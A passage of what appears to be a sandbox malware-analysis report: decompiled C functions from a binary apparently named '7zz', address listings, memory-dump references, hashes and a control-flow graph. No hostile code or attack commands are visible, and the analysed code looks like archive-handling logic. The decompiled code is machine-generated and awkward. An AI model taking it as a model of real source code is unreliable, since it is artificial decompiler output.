																	__eflags = 0;
																	L65:
																	__eflags =  *((intOrPtr*)(_t810 + 0x5a)) - _t651;
																	if( *((intOrPtr*)(_t810 + 0x5a)) == _t651) {
																		L68:
																		_t793 = 0;
																		__eflags = 0;
																		L69:
																		E004098CF( *(_t822 - 0x54), _t793, _t754, _t628); // executed
																		goto L70;
																	}
																	__eflags =  *((intOrPtr*)(_t810 + 0x7c)) - _t651;
																	if( *((intOrPtr*)(_t810 + 0x7c)) == _t651) {
																		goto L68;
																	}
																	_t793 = _t810 + 0x60;
																	goto L69;
																}
																__eflags =  *((intOrPtr*)(_t810 + 0x7d)) - _t651;
																if( *((intOrPtr*)(_t810 + 0x7d)) == _t651) {
																	goto L64;
																}
																_t754 = _t810 + 0x68;
																goto L65;
															}
															__eflags =  *(_t810 + 0x7e) - _t651;
															if( *(_t810 + 0x7e) == _t651) {
																goto L58;
															}
															_t628 = _t810 + 0x70;
															goto L61;
														}
														__eflags =  *((intOrPtr*)(_t822 - 0x1c)) - _t651;
														if( *((intOrPtr*)(_t822 - 0x1c)) == _t651) {
															goto L71;
														}
														E00408635(_t822 - 0x24);
														goto L53;
													}
													 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
													 *((char*)(_t822 - 4)) = 6;
													goto L89;
												}
												__eflags = _t461 == 1;
												if(_t461 == 1) {
													 *(_t822 + 0xc) = _t681 - 1;
												}
												goto L49;
											}
											 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
											 *((char*)(_t822 - 4)) = 5;
											goto L89;
										}
										 *(_t810 + 0x7f) = 1;
										 *((intOrPtr*)(_t810 + 0x78)) =  *((intOrPtr*)(_t822 - 0x68));
										goto L32;
									}
									 *((char*)(_t822 - 4)) = 1;
									E0040C20F(_t822 - 0x70);
									goto L145;
								}
								_push(8);
								_t637 = L004079F2();
								__eflags = _t637 - _t651;
								if(_t637 == _t651) {
									_t821 = 0;
									__eflags = 0;
								} else {
									 *(_t637 + 4) = _t651;
									 *_t637 = 0x47aa80;
									_t821 = _t637;
								}
								__eflags = _t821 - _t651;
								if(_t821 != _t651) {
									 *((intOrPtr*)( *_t821 + 4))(_t821);
								}
								 *( *(_t822 + 0x10)) = _t821;
								goto L141;
							}
							__eflags =  *((intOrPtr*)(_t810 + 0x80)) - _t651;
							_t643 = E00408E6D( *((intOrPtr*)(_t810 + 0x80)) - _t651, _t822 - 0x48, _t422 & 0xffffff00 |  *((intOrPtr*)(_t810 + 0x80)) == _t651);
							__eflags = _t643 - _t651;
							if(_t643 == _t651) {
								goto L141;
							}
							goto L17;
						}
						__eflags =  *(_t822 - 0x70) - 0x15;
						if( *(_t822 - 0x70) == 0x15) {
							 *(_t810 + 0x58) = 1;
							 *((intOrPtr*)(_t810 + 0x50)) =  *((intOrPtr*)(_t822 - 0x68));
							 *((intOrPtr*)(_t810 + 0x54)) =  *((intOrPtr*)(_t822 - 0x64));
							goto L13;
						}
						 *((char*)(_t822 - 4)) = 1;
						E0040C20F(_t822 - 0x70);
						goto L113;
					}
					 *((char*)(_t822 - 4)) = 1;
					E0040C20F(_t822 - 0x70);
					_t817 =  *(_t822 + 8);
					goto L114;
				}
				L5:
				_t651 = _t422;
				goto L141;
			}







































































                                                                                  0x0041202c
                                                                                  0x00412039
                                                                                  0x0041203d
                                                                                  0x0041203f
                                                                                  0x00412042
                                                                                  0x00412048
                                                                                  0x00412050
                                                                                  0x00412053
                                                                                  0x00412058
                                                                                  0x0041205b
                                                                                  0x0041205b
                                                                                  0x00412060
                                                                                  0x00412066
                                                                                  0x00412068
                                                                                  0x0041206c
                                                                                  0x00412071
                                                                                  0x00412074
                                                                                  0x00412074
                                                                                  0x00412079
                                                                                  0x00412084
                                                                                  0x00412087
                                                                                  0x0041208a
                                                                                  0x00412090
                                                                                  0x00412096
                                                                                  0x0041209c
                                                                                  0x0041209f
                                                                                  0x004120a2
                                                                                  0x004120a5
                                                                                  0x004120b0
                                                                                  0x004120b1
                                                                                  0x004120b5
                                                                                  0x004120b8
                                                                                  0x004120ba
                                                                                  0x004120c1
                                                                                  0x004120d6
                                                                                  0x004120db
                                                                                  0x004120dd
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004120e6
                                                                                  0x004120eb
                                                                                  0x004120ef
                                                                                  0x004120fe
                                                                                  0x00412103
                                                                                  0x00412106
                                                                                  0x00412108
                                                                                  0x0041210b
                                                                                  0x00412121
                                                                                  0x00412125
                                                                                  0x0041214f
                                                                                  0x00412152
                                                                                  0x00412156
                                                                                  0x00412161
                                                                                  0x00412162
                                                                                  0x00412166
                                                                                  0x0041216b
                                                                                  0x0041216d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00412175
                                                                                  0x0041217a
                                                                                  0x0041217c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00412185
                                                                                  0x00412187
                                                                                  0x004121a4
                                                                                  0x004121a4
                                                                                  0x004121a7
                                                                                  0x00412bd2
                                                                                  0x00412bd5
                                                                                  0x00412bd7
                                                                                  0x00412bd7
                                                                                  0x00412bdd
                                                                                  0x00412be3
                                                                                  0x00412be5
                                                                                  0x00412bea
                                                                                  0x00412bed
                                                                                  0x00412bfd
                                                                                  0x00412bfd
                                                                                  0x00412bef
                                                                                  0x00412bef
                                                                                  0x00412bf2
                                                                                  0x00412bf5
                                                                                  0x00412bf5
                                                                                  0x00412c06
                                                                                  0x00412c0c
                                                                                  0x00412c11
                                                                                  0x00412c17
                                                                                  0x00412c19
                                                                                  0x00412c1c
                                                                                  0x00412c21
                                                                                  0x00412c21
                                                                                  0x00412c27
                                                                                  0x00412c37
                                                                                  0x00412c3f
                                                                                  0x00412c41
                                                                                  0x00412c43
                                                                                  0x00412c48
                                                                                  0x00412c48
                                                                                  0x00412c4e
                                                                                  0x00412c50
                                                                                  0x00412c56
                                                                                  0x00412c56
                                                                                  0x00412c56
                                                                                  0x00412c5a
                                                                                  0x00412c5d
                                                                                  0x00412c60
                                                                                  0x00412c60
                                                                                  0x00412c64
                                                                                  0x00412c67
                                                                                  0x00412c6d
                                                                                  0x00412c7c
                                                                                  0x00412c81
                                                                                  0x00412c8a
                                                                                  0x00412c8a
                                                                                  0x004121ad
                                                                                  0x004121b3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004121b9
                                                                                  0x004121bf
                                                                                  0x004121f0
                                                                                  0x004121f4
                                                                                  0x00412203
                                                                                  0x0041220b
                                                                                  0x0041220d
                                                                                  0x0041220f
                                                                                  0x00412222
                                                                                  0x00412227
                                                                                  0x00412235
                                                                                  0x00412239
                                                                                  0x00412bb4
                                                                                  0x00412bb8
                                                                                  0x00412bbd
                                                                                  0x00412bc2
                                                                                  0x00412bc5
                                                                                  0x00412bcb
                                                                                  0x00000000
                                                                                  0x00412bcb
                                                                                  0x0041223f
                                                                                  0x00412242
                                                                                  0x00412245
                                                                                  0x00412249
                                                                                  0x0041224e
                                                                                  0x00412254
                                                                                  0x00412258
                                                                                  0x00412259
                                                                                  0x0041225b
                                                                                  0x0041225e
                                                                                  0x00412263
                                                                                  0x00412265
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00412270
                                                                                  0x00412274
                                                                                  0x00412275
                                                                                  0x00412277
                                                                                  0x00412278
                                                                                  0x0041227d
                                                                                  0x0041227f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0041228a
                                                                                  0x0041228e
                                                                                  0x0041228f
                                                                                  0x00412291
                                                                                  0x00412292
                                                                                  0x00412297
                                                                                  0x00412299
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004122a2
                                                                                  0x004122ac
                                                                                  0x004122ad
                                                                                  0x004122b1
                                                                                  0x004122b6
                                                                                  0x004122b8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004122c1
                                                                                  0x004122c6
                                                                                  0x004122cb
                                                                                  0x004122d4
                                                                                  0x004122d8
                                                                                  0x004122dd
                                                                                  0x004122e0
                                                                                  0x004122e2
                                                                                  0x004122f3
                                                                                  0x004122f6
                                                                                  0x004122f6
                                                                                  0x004122f7
                                                                                  0x00412302
                                                                                  0x00412308
                                                                                  0x0041230a
                                                                                  0x0041230d
                                                                                  0x0041231b
                                                                                  0x0041231b
                                                                                  0x0041231d
                                                                                  0x0041231d
                                                                                  0x00412320
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00412335
                                                                                  0x0041233a
                                                                                  0x0041233c
                                                                                  0x0041234e
                                                                                  0x00000000
                                                                                  0x0041234e
                                                                                  0x0041233e
                                                                                  0x00412345
                                                                                  0x004125c9
                                                                                  0x004125cc
                                                                                  0x004125d4
                                                                                  0x004125d8
                                                                                  0x004125dd
                                                                                  0x00412b4c
                                                                                  0x00412b4f
                                                                                  0x00412b55
                                                                                  0x00000000
                                                                                  0x00412b55
                                                                                  0x00412351
                                                                                  0x00412356
                                                                                  0x0041235d
                                                                                  0x00412365
                                                                                  0x00412370
                                                                                  0x00412375
                                                                                  0x00412378
                                                                                  0x0041237c
                                                                                  0x00412429
                                                                                  0x0041242c
                                                                                  0x0041242f
                                                                                  0x00412433
                                                                                  0x00412438
                                                                                  0x0041243e
                                                                                  0x00412442
                                                                                  0x0041247c
                                                                                  0x0041247f
                                                                                  0x00412925
                                                                                  0x00412925
                                                                                  0x00412928
                                                                                  0x00412b76
                                                                                  0x00412b7d
                                                                                  0x00412b85
                                                                                  0x00412b8d
                                                                                  0x00412b93
                                                                                  0x00412b9a
                                                                                  0x00412b9e
                                                                                  0x00412ba6
                                                                                  0x00412baa
                                                                                  0x00000000
                                                                                  0x00412baa
                                                                                  0x0041292e
                                                                                  0x00412930
                                                                                  0x00412935
                                                                                  0x00412938
                                                                                  0x00412a0e
                                                                                  0x00412a0e
                                                                                  0x0041293e
                                                                                  0x0041293e
                                                                                  0x00412941
                                                                                  0x00412945
                                                                                  0x0041294b
                                                                                  0x0041294b
                                                                                  0x00412a10
                                                                                  0x00412a12
                                                                                  0x00412a18
                                                                                  0x00412a1b
                                                                                  0x00412a20
                                                                                  0x00412a20
                                                                                  0x00412a2b
                                                                                  0x00412a31
                                                                                  0x00412a35
                                                                                  0x00412a3a
                                                                                  0x00412a3e
                                                                                  0x00412a47
                                                                                  0x00412a4c
                                                                                  0x00412a4e
                                                                                  0x00412aea
                                                                                  0x00412aed
                                                                                  0x00412b5c
                                                                                  0x00412b63
                                                                                  0x00412b6b
                                                                                  0x00412b6f
                                                                                  0x00412b71
                                                                                  0x00000000
                                                                                  0x00412b71
                                                                                  0x00412aef
                                                                                  0x00412b00
                                                                                  0x00412b03
                                                                                  0x00412b05
                                                                                  0x00412b08
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00412b0a
                                                                                  0x00412b0c
                                                                                  0x00412b10
                                                                                  0x00412b15
                                                                                  0x00412b15
                                                                                  0x00412b1b
                                                                                  0x00412b23
                                                                                  0x00412b29
                                                                                  0x00412b34
                                                                                  0x00412b38
                                                                                  0x00412b40
                                                                                  0x00412b44
                                                                                  0x00412b49
                                                                                  0x00412a54
                                                                                  0x00412a60
                                                                                  0x00412a65
                                                                                  0x00412a6b
                                                                                  0x00412a72
                                                                                  0x00412a75
                                                                                  0x00412a78
                                                                                  0x00412a7a
                                                                                  0x00412a7c
                                                                                  0x00412ab4
                                                                                  0x00412ab9
                                                                                  0x00412abc
                                                                                  0x00412ac0
                                                                                  0x00412ac5
                                                                                  0x00412ac5
                                                                                  0x00412acb
                                                                                  0x00412ad3
                                                                                  0x00412ad9
                                                                                  0x00412ae1
                                                                                  0x00412686
                                                                                  0x00412689
                                                                                  0x00412691
                                                                                  0x00412695
                                                                                  0x00000000
                                                                                  0x00412695
                                                                                  0x00412a7e
                                                                                  0x00412a83
                                                                                  0x00412a86
                                                                                  0x00412a8a
                                                                                  0x00412a8f
                                                                                  0x00412a8f
                                                                                  0x00412a95
                                                                                  0x00412a9d
                                                                                  0x00412aa3
                                                                                  0x00412aab
                                                                                  0x004129c7
                                                                                  0x004129ca
                                                                                  0x004129d2
                                                                                  0x004129d6
                                                                                  0x004129db
                                                                                  0x004129db
                                                                                  0x00000000
                                                                                  0x00412a4e
                                                                                  0x00412488
                                                                                  0x0041248d
                                                                                  0x00412496
                                                                                  0x0041249a
                                                                                  0x0041249f
                                                                                  0x004124a1
                                                                                  0x00412918
                                                                                  0x0041291b
                                                                                  0x0041291f
                                                                                  0x00000000
                                                                                  0x00412924
                                                                                  0x004124aa
                                                                                  0x004124aa
                                                                                  0x004124ac
                                                                                  0x00412503
                                                                                  0x00412505
                                                                                  0x00412513
                                                                                  0x00412532
                                                                                  0x00412534
                                                                                  0x00412536
                                                                                  0x0041257c
                                                                                  0x0041257c
                                                                                  0x0041257e
                                                                                  0x004126a6
                                                                                  0x004126a6
                                                                                  0x004126ab
                                                                                  0x004126ab
                                                                                  0x004126ae
                                                                                  0x004126b1
                                                                                  0x00412761
                                                                                  0x00412764
                                                                                  0x00412955
                                                                                  0x0041295a
                                                                                  0x0041295c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00412967
                                                                                  0x00412975
                                                                                  0x00412979
                                                                                  0x00412981
                                                                                  0x00412985
                                                                                  0x0041298a
                                                                                  0x00412994
                                                                                  0x00412997
                                                                                  0x0041299a
                                                                                  0x0041299c
                                                                                  0x0041299e
                                                                                  0x004129e2
                                                                                  0x004129ea
                                                                                  0x004129f2
                                                                                  0x004129fa
                                                                                  0x00412a02
                                                                                  0x00412a05
                                                                                  0x00000000
                                                                                  0x00412a05
                                                                                  0x004129a0
                                                                                  0x004129a8
                                                                                  0x004129b0
                                                                                  0x004129b8
                                                                                  0x004129c0
                                                                                  0x004129c3
                                                                                  0x00000000
                                                                                  0x004129c3
                                                                                  0x00412771
                                                                                  0x00412779
                                                                                  0x0041277d
                                                                                  0x00412782
                                                                                  0x00412784
                                                                                  0x00412823
                                                                                  0x00412828
                                                                                  0x0041282a
                                                                                  0x00412912
                                                                                  0x00000000
                                                                                  0x00412917
                                                                                  0x00412839
                                                                                  0x00412847
                                                                                  0x0041284b
                                                                                  0x00412853
                                                                                  0x00412857
                                                                                  0x0041285c
                                                                                  0x00412866
                                                                                  0x00412869
                                                                                  0x0041286c
                                                                                  0x0041286e
                                                                                  0x00412870
                                                                                  0x004128b7
                                                                                  0x004128bf
                                                                                  0x004128c7
                                                                                  0x004128cf
                                                                                  0x004128d7
                                                                                  0x004128df
                                                                                  0x004128e2
                                                                                  0x004128e6
                                                                                  0x004128e9
                                                                                  0x004128f1
                                                                                  0x004128f5
                                                                                  0x004128fa
                                                                                  0x004128fa
                                                                                  0x004128ff
                                                                                  0x00412902
                                                                                  0x00412908
                                                                                  0x00000000
                                                                                  0x00412908
                                                                                  0x00412872
                                                                                  0x0041287a
                                                                                  0x00412882
                                                                                  0x0041288a
                                                                                  0x00412892
                                                                                  0x0041289a
                                                                                  0x0041289d
                                                                                  0x004128a1
                                                                                  0x004128a4
                                                                                  0x004128ac
                                                                                  0x004128b0
                                                                                  0x00000000
                                                                                  0x004128b0
                                                                                  0x0041278a
                                                                                  0x00412797
                                                                                  0x0041279c
                                                                                  0x004127a2
                                                                                  0x004127a9
                                                                                  0x004127ac
                                                                                  0x004127af
                                                                                  0x004127b1
                                                                                  0x004127b3
                                                                                  0x004127e9
                                                                                  0x004127f1
                                                                                  0x004127f9
                                                                                  0x00412801
                                                                                  0x00412809
                                                                                  0x00412811
                                                                                  0x00412814
                                                                                  0x00000000
                                                                                  0x00412814
                                                                                  0x004127b5
                                                                                  0x004127bd
                                                                                  0x004127c5
                                                                                  0x004127cd
                                                                                  0x004127d5
                                                                                  0x004127dd
                                                                                  0x004127e0
                                                                                  0x00000000
                                                                                  0x004127e0
                                                                                  0x004126ba
                                                                                  0x004126bf
                                                                                  0x004126c1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004126d0
                                                                                  0x004126de
                                                                                  0x004126e2
                                                                                  0x004126ea
                                                                                  0x004126ee
                                                                                  0x004126f3
                                                                                  0x004126fd
                                                                                  0x00412700
                                                                                  0x00412703
                                                                                  0x00412705
                                                                                  0x00412707
                                                                                  0x00412735
                                                                                  0x0041273d
                                                                                  0x00412745
                                                                                  0x0041274d
                                                                                  0x00412755
                                                                                  0x00412758
                                                                                  0x00000000
                                                                                  0x00412758
                                                                                  0x00412709
                                                                                  0x00412711
                                                                                  0x00412719
                                                                                  0x00412721
                                                                                  0x00412729
                                                                                  0x0041272c
                                                                                  0x00000000
                                                                                  0x0041272c
                                                                                  0x00412584
                                                                                  0x00412584
                                                                                  0x00412585
                                                                                  0x0041269f
                                                                                  0x00000000
                                                                                  0x0041269f
                                                                                  0x0041258b
                                                                                  0x0041258b
                                                                                  0x0041258c
                                                                                  0x00412663
                                                                                  0x0041266b
                                                                                  0x00412673
                                                                                  0x0041267b
                                                                                  0x00412682
                                                                                  0x00000000
                                                                                  0x00412682
                                                                                  0x00412592
                                                                                  0x00412592
                                                                                  0x00412593
                                                                                  0x00412634
                                                                                  0x0041263b
                                                                                  0x00412643
                                                                                  0x0041264b
                                                                                  0x00412653
                                                                                  0x0041265a
                                                                                  0x00000000
                                                                                  0x0041265a
                                                                                  0x00412599
                                                                                  0x00412599
                                                                                  0x0041259a
                                                                                  0x00412628
                                                                                  0x00000000
                                                                                  0x00412628
                                                                                  0x004125a0
                                                                                  0x004125a3
                                                                                  0x004125a4
                                                                                  0x004125e7
                                                                                  0x004125ef
                                                                                  0x004125f7
                                                                                  0x004125ff
                                                                                  0x00412609
                                                                                  0x0041260d
                                                                                  0x00412615
                                                                                  0x00412619
                                                                                  0x0041261e
                                                                                  0x00000000
                                                                                  0x0041261e
                                                                                  0x004125a6
                                                                                  0x004125ae
                                                                                  0x004125b6
                                                                                  0x004125be
                                                                                  0x004125c5
                                                                                  0x00000000
                                                                                  0x004125c5
                                                                                  0x0041253b
                                                                                  0x00412543
                                                                                  0x0041254b
                                                                                  0x00412553
                                                                                  0x0041255d
                                                                                  0x00412561
                                                                                  0x00412569
                                                                                  0x0041256d
                                                                                  0x00412572
                                                                                  0x00000000
                                                                                  0x00412572
                                                                                  0x004124af
                                                                                  0x004124b0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004124b9
                                                                                  0x004124c1
                                                                                  0x004124c9
                                                                                  0x004124d1
                                                                                  0x004124d7
                                                                                  0x004124db
                                                                                  0x004124e3
                                                                                  0x004124e7
                                                                                  0x00000000
                                                                                  0x004124e7
                                                                                  0x00412444
                                                                                  0x0041244d
                                                                                  0x00412452
                                                                                  0x00412455
                                                                                  0x00412459
                                                                                  0x00412459
                                                                                  0x00412461
                                                                                  0x00412469
                                                                                  0x0041246f
                                                                                  0x00412473
                                                                                  0x00000000
                                                                                  0x00412473
                                                                                  0x00412382
                                                                                  0x00412388
                                                                                  0x0041239b
                                                                                  0x0041239b
                                                                                  0x0041239e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004123a9
                                                                                  0x004123ac
                                                                                  0x004123af
                                                                                  0x004123b2
                                                                                  0x004123bc
                                                                                  0x004123c1
                                                                                  0x004123c5
                                                                                  0x004123ca
                                                                                  0x004123d0
                                                                                  0x0041241c
                                                                                  0x0041241f
                                                                                  0x00412423
                                                                                  0x00000000
                                                                                  0x00412428
                                                                                  0x004123d2
                                                                                  0x004123d5
                                                                                  0x004123e1
                                                                                  0x004123e1
                                                                                  0x004123e4
                                                                                  0x004123e7
                                                                                  0x004123ee
                                                                                  0x004123ee
                                                                                  0x004123e9
                                                                                  0x004123e9
                                                                                  0x004123e9
                                                                                  0x004123f0
                                                                                  0x004123f0
                                                                                  0x004123f3
                                                                                  0x004123ff
                                                                                  0x004123ff
                                                                                  0x004123ff
                                                                                  0x00412401
                                                                                  0x00412401
                                                                                  0x00412404
                                                                                  0x00412410
                                                                                  0x00412410
                                                                                  0x00412410
                                                                                  0x00412412
                                                                                  0x00412417
                                                                                  0x00000000
                                                                                  0x00412417
                                                                                  0x00412406
                                                                                  0x00412409
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0041240b
                                                                                  0x00000000
                                                                                  0x0041240b
                                                                                  0x004123f5
                                                                                  0x004123f8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004123fa
                                                                                  0x00000000
                                                                                  0x004123fa
                                                                                  0x004123d7
                                                                                  0x004123da
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004123dc
                                                                                  0x00000000
                                                                                  0x004123dc
                                                                                  0x0041238a
                                                                                  0x0041238d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00412396
                                                                                  0x00000000
                                                                                  0x00412396
                                                                                  0x0041230f
                                                                                  0x00412312
                                                                                  0x00000000
                                                                                  0x00412312
                                                                                  0x004122f9
                                                                                  0x004122fa
                                                                                  0x004122fd
                                                                                  0x004122fd
                                                                                  0x00000000
                                                                                  0x004122fa
                                                                                  0x004122e4
                                                                                  0x004122e7
                                                                                  0x00000000
                                                                                  0x004122e7
                                                                                  0x0041222c
                                                                                  0x00412230
                                                                                  0x00000000
                                                                                  0x00412230
                                                                                  0x00412214
                                                                                  0x00412218
                                                                                  0x00000000
                                                                                  0x00412218
                                                                                  0x004121c1
                                                                                  0x004121c3
                                                                                  0x004121c8
                                                                                  0x004121cb
                                                                                  0x004121da
                                                                                  0x004121da
                                                                                  0x004121cd
                                                                                  0x004121cd
                                                                                  0x004121d0
                                                                                  0x004121d6
                                                                                  0x004121d6
                                                                                  0x004121dc
                                                                                  0x004121de
                                                                                  0x004121e3
                                                                                  0x004121e3
                                                                                  0x004121e9
                                                                                  0x00000000
                                                                                  0x004121e9
                                                                                  0x00412189
                                                                                  0x00412197
                                                                                  0x0041219c
                                                                                  0x0041219e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0041219e
                                                                                  0x00412127
                                                                                  0x0041212c
                                                                                  0x00412142
                                                                                  0x00412146
                                                                                  0x0041214c
                                                                                  0x00000000
                                                                                  0x0041214c
                                                                                  0x00412131
                                                                                  0x00412135
                                                                                  0x00000000
                                                                                  0x00412135
                                                                                  0x00412110
                                                                                  0x00412114
                                                                                  0x00412119
                                                                                  0x00000000
                                                                                  0x00412119
                                                                                  0x004120c3
                                                                                  0x004120c3
                                                                                  0x00000000

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: ,$59@$can not open output file
                                                                                  • API String ID: 3519838083-2797906540
                                                                                  • Opcode ID: a83944683b8da85deb860ed7ac8c2a38f00ab0faa09fc1eaa5330bdfff491946
                                                                                  • Instruction ID: cf4575037a337767e5e75bbbc8f08648ffbb7fd2cc7ee605cc239c560f10ba1b
                                                                                  • Opcode Fuzzy Hash: a83944683b8da85deb860ed7ac8c2a38f00ab0faa09fc1eaa5330bdfff491946
                                                                                  • Instruction Fuzzy Hash: 7682CD30D04248EFDF11EFA4DA40ADDBBB0AF54308F14446EE045B7292DB796E58DB6A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00416922 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 261COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1966 416922-41695d __EH_prolog call 404ad0 1969 416963-41696f 1966->1969 1970 416a25-416a93 call 404ad0 call 4039c0 call 403532 call 417172 call 416c31 call 407a18 * 2 1966->1970 1975 416971-416973 1969->1975 1976 416978-41697e 1969->1976 2011 416a95-416a98 call 409d7c 1970->2011 2012 416b09-416b4a call 411c21 call 4192f5 1970->2012 1978 416a02-416a10 call 408604 1975->1978 1979 416980-4169a8 call 401e9a call 4179f7 1976->1979 1980 4169f5-4169f8 1976->1980 1988 416c20-416c2e 1978->1988 1993 416a15-416a20 call 407a18 1979->1993 1994 4169aa-4169ba call 4179e9 1979->1994 1980->1970 1983 4169fa-4169fd 1980->1983 1983->1978 2004 416c12-416c1e call 408604 1993->2004 1994->1993 2003 4169bc-4169d1 call 408e6d 1994->2003 2013 4169d3-4169d9 call 415c6d 2003->2013 2014 4169de-4169f3 call 407a18 2003->2014 2004->1988 2019 416a9d-416a9f 2011->2019 2028 416b68-416b6b 2012->2028 2029 416b4c-416b63 call 407a18 2012->2029 2013->2014 2014->1979 2014->1980 2019->2012 2022 416aa1-416aab GetLastError 2019->2022 2024 416ab2-416b04 call 403532 call 40b0a0 call 401e26 call 407a18 * 3 2022->2024 2025 416aad 2022->2025 2041 416bff-416c0d call 40862d call 408604 2024->2041 2025->2024 2032 416b77 2028->2032 2033 416b6d-416b70 2028->2033 2029->2041 2034 416b79-416b81 2032->2034 2033->2032 2037 416b72-416b75 2033->2037 2038 416b83-416ba6 2034->2038 2039 416bd4-416bda 2034->2039 2037->2034 2055 416bc6-416bd2 call 40c20f 2038->2055 2056 416ba8-416bad 2038->2056 2070 416bdb call 4290c5 2039->2070 2071 416bdb call 4297ca 2039->2071 2041->2004 2044 416bde 2048 416be0-416be4 2044->2048 2068 416be6 call 407cd5 2048->2068 2069 416be6 call 46c55c 2048->2069 2054 416be9-416bfb call 407a18 2054->2041 2055->2048 2059 416bb6-416bc3 call 40c5ad 2056->2059 2060 416baf-416bb4 2056->2060 2059->2055 2060->2055 2060->2059 2068->2054 2069->2054 2070->2044 2071->2044
                                                                                  C-Code - Quality: 93%
                                                                                  			E00416922(intOrPtr __ecx, signed int __edx, void* __eflags) {
				intOrPtr* _t123;
				void* _t130;
				signed int _t144;
				signed int _t153;
				signed int _t156;
				intOrPtr _t158;
				signed int _t160;
				void* _t162;
				void* _t163;
				signed int _t169;
				signed int _t175;
				signed int _t180;
				signed int _t185;
				intOrPtr _t198;
				intOrPtr* _t208;
				signed int* _t227;
				intOrPtr* _t231;
				signed int* _t234;
				void* _t235;
				signed int _t236;
				void* _t238;

				L0046B890(E00474B3C, _t238);
				_t123 =  *((intOrPtr*)(_t238 + 0x20));
				_t185 = 0;
				 *_t123 = 0;
				 *((intOrPtr*)(_t123 + 4)) = 0;
				_t231 =  *((intOrPtr*)(__ecx));
				 *((intOrPtr*)(_t238 - 0x14)) = __ecx;
				 *(_t238 - 0x1c) = __edx;
				E00404AD0(_t238 - 0x58, 4);
				 *((intOrPtr*)(_t238 - 0x58)) = 0x47ab80;
				_t234 =  *(_t238 + 0x10);
				 *(_t238 - 4) = 0;
				if( *_t234 != 0) {
					L13:
					E00404AD0(_t238 - 0x6c, 4);
					 *((intOrPtr*)(_t238 - 0x6c)) = 0x47a420;
					 *(_t238 - 4) = 2;
					L004039C0(_t238 - 0x34,  &(_t234[4]));
					 *(_t238 - 4) = 3;
					L00403532(_t238 - 0x28, 0x48bb7c);
					 *(_t238 - 4) = 4;
					_t130 = L00417172(_t238 - 0x40,  *((intOrPtr*)(_t238 - 0x14)) + 0x10, __eflags);
					 *(_t238 - 4) = 5;
					L00416C31(_t238 - 0x34, _t238 - 0x28, _t130);
					L00407A18( *((intOrPtr*)(_t238 - 0x40)));
					 *(_t238 - 4) = 3;
					L00407A18( *(_t238 - 0x28));
					__eflags =  *((intOrPtr*)(_t238 - 0x30)) - _t185;
					if( *((intOrPtr*)(_t238 - 0x30)) == _t185) {
						L18:
						asm("sbb eax, eax");
						E00411C21( *((intOrPtr*)(_t238 + 0x18)),  ~( *_t234) &  *(_t238 - 0x1c),  *((intOrPtr*)(_t238 - 0x14)),  *((intOrPtr*)(_t238 + 0x14)), _t234[0], _t234[0], _t234[1], _t238 - 0x34, _t238 - 0x6c,  *((intOrPtr*)(_t238 + 8)),  *((intOrPtr*)(_t238 + 0xc)));
						_t227 =  &(_t234[7]);
						_t144 = E004192F5(_t231, _t227);
						__eflags = _t144 - _t185;
						 *(_t238 + 0x10) = _t144;
						if(_t144 == _t185) {
							__eflags = _t234[0] - _t185;
							if(_t234[0] == _t185) {
								L23:
								__eflags = 0;
							} else {
								__eflags = _t234[1] - _t185;
								if(_t234[1] != _t185) {
									goto L23;
								} else {
									_push(1);
									_pop(0);
								}
							}
							_push( *((intOrPtr*)(_t238 + 0x18)));
							__eflags =  *_t234 - _t185;
							_t198 =  *_t231;
							_push(0);
							if( *_t234 == _t185) {
								_t235 =  *((intOrPtr*)(_t198 + 0x1c))(_t231,  *((intOrPtr*)(_t238 - 0x4c)),  *((intOrPtr*)(_t238 - 0x50)));
							} else {
								_t235 =  *((intOrPtr*)(_t198 + 0x1c))(_t231, _t185, 0xffffffff);
								 *(_t238 - 0x44) = _t185;
